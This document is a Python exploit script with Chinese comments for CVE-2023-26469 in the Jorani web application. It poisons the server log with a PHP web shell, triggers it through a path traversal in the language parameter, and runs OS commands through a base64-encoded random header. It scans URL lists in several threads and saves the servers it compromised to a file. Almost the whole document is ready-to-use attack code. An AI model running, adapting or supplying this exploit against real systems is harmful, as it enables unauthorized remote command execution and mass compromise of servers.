Jorani_CVE-2023-26469_exp.py

# 作者: VulnExpo
# 日期: 2023-11-13

import argparse
import threading
import requests
import datetime
import re
import base64
import random
import string
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def check_for_vulnerability(url, proxies=None, success_file=None):
	try:
		# 正则表达式模式
		CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')
		CMD_PATTERN = re.compile('---------(.*?)---------', re.S)

		# 定义目标 URL 路径
		URLS = {
			'login': '/session/login',
			'view': '/pages/view/',
		}

		# 生成随机的请求头名称
		def generate_random_header_name():
			alphabet = string.ascii_uppercase
			return ''.join(random.choice(alphabet) for i in range(12))

		HEADER_NAME = generate_random_header_name()

		# 恶意负载
		POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"
		PATH_TRAV_PAYLOAD = "../../application/logs"
		command = "id"

		# 创建会话并获取会话 cookie
		session = requests.Session()
		# print("Requesting session cookie")
		response = session.get(url + URLS['login'], verify=False)
		cookies = session.cookies.get_dict()

		# 提取 CSRF 令牌
		csrf_token = re.findall(CSRF_PATTERN, response.text)[0]
		# print(f"Poisoning log file with payload: '{POISON_PAYLOAD}'")
		# print(f"Setting path traversal to '{PATH_TRAV_PAYLOAD}'")
		# print(f"Recovered CSRF Token: {csrf_token}")

		# 向服务器发送恶意请求以污染日志文件
		data = {
			"csrf_test_jorani": csrf_token,
			"last_page": "session/login",
			"language": PATH_TRAV_PAYLOAD,
			"login": POISON_PAYLOAD,
			"CipheredValue": "DummyPassword"
		}
		session.post(url + URLS['login'], data=data)

		log_file_name = f"log-{datetime.date.today().isoformat()}"

		# 设置特殊请求头以执行操作系统命令
		BypassRedirect = {
			'X-REQUESTED-WITH': 'XMLHttpRequest',
			HEADER_NAME: base64.b64encode(f"echo ---------;{command} 2>&1;echo ---------;".encode()).decode()
		}
		response = session.get(url + URLS['view'] + log_file_name, headers=BypassRedirect)
		command_output = re.findall(CMD_PATTERN, response.text)
		try:
			print(f"目标 {url} 响应内容 {command_output[0].strip()}")
			with open(success_file, 'a') as s_file:
				s_file.write(f"++++++++++++++++++\n")
				s_file.write(f"目标URL: {url}\n")
				s_file.write(f"响应内容: {command_output[0].strip()}\n\n")
		except Exception as e:
			print(f"目标 {url} 发生异常：{e}")
			return False
	except Exception as e:
		print(f"目标 {url} 发生异常：{e}")

def scan_targets(targets, proxies=None, success_file=None):
	for target in targets:
		target = target.strip()
		check_for_vulnerability(target, proxies, success_file)

def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
	threads = []

	for i in range(num_threads):
		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
		threads.append(thread)

	for thread in threads:
		thread.start()

	for thread in threads:
		thread.join()

if __name__ == '__main__':
	parser = argparse.ArgumentParser(description="Jorani远程命令执行漏洞CVE-2023-26469")
	parser.add_argument("-u", "--url", help="目标URL")
	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
	args = parser.parse_args()

	if not args.url and not args.file:
		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
		exit(1)

	if args.url:
		urls = [args.url]
	elif args.file:
		with open(args.file, 'r') as file:
			urls = file.readlines()

	success_file = 'success_targets.txt'

	proxies = {
		"http": args.proxy,
		"https": args.proxy
	} if args.proxy else None

	multi_threaded_scan(urls, proxies, success_file, args.threads)

	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")